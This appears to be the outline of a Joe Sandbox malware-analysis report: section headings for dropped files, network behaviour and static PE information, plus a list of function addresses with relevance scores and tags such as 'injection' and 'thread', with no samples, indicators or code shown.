Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 064280F8, Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Function 01606AA1, Relevance: 6.1, APIs: 4, Instructions: 124
threadCOMMON

Function 01606AB0, Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 0642AFC0, Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0160BAD8, Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 0160DB8D, Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Function 0160DB98, Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 0642A938, Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0642AE28, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 0642A7A0, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 01606CD1, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 01606CD8, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 06426A00, Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON